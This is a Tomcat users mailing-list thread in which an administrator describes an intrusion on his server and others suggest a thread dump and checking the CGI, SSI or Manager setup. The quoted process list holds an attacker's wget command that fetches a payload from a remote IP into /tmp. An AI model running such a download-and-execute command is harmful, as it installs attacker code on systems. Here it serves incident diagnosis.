Ok, i will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config
I think at mid day will have all the info. Thanks all for replying me and all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini <http://ar.linkedin.com/in/santagostini> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net >: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA256 > > Konstantin, > > On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: > > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini > > <lsantagost...@gmail.com>: > >> Hello Dan, > >> > >> Nop, the attacker is executing locally the following > >> > >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh > >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget > >> http://218.199.102.59/.xy/squid32 -O /tmp/squid > >> > >> And the launch squid who tries to connect via ssh to varoius > >> places. > >> > >> Right now its time to leave the office, but in a few hours i will > >> paste in pastebin access logs, config files, wherever you tell > >> me. > >> > >> This is my pstree > >> > >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd > >> ├─java─┬─sh───wget │ └─263*[{java}] > > > > sh launched by tomcat's java? > > Yes: please verify that it's the JVM running Tomcat, and not just any > JVM process. > > > Take a thread dump: > > > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F > > > > It shall show what is stacktrace in thread that launched external > > process. > > +1 > > The only things that ship with Tomcat that call Process.exec() are the > CGI servlet and SSI, both of which are disabled by default. So, either > you have an insecure CGI/SSI configuration, your web application has a > vulnerability, or you have deployed something like the Manager > application and improperly-secured it. > > A classic example of such an intrusion might be that someone got a > foothold elsewhere into your network, and the Manager web application > is not properly secured with a password, etc. > > - -chris > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1 > Comment: GPGTools - http://gpgtools.org > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ > > iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp > +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 > HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC > D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o > gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr > BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS > ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj > UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb > TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W > WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 > 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 > lvJcfOhzHLwo07Pv+y3J > =EiX9 > -----END PGP SIGNATURE----- > > --------------------------------------------------------------------- > To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org > For additional commands, e-mail: users-h...@tomcat.apache.org > >
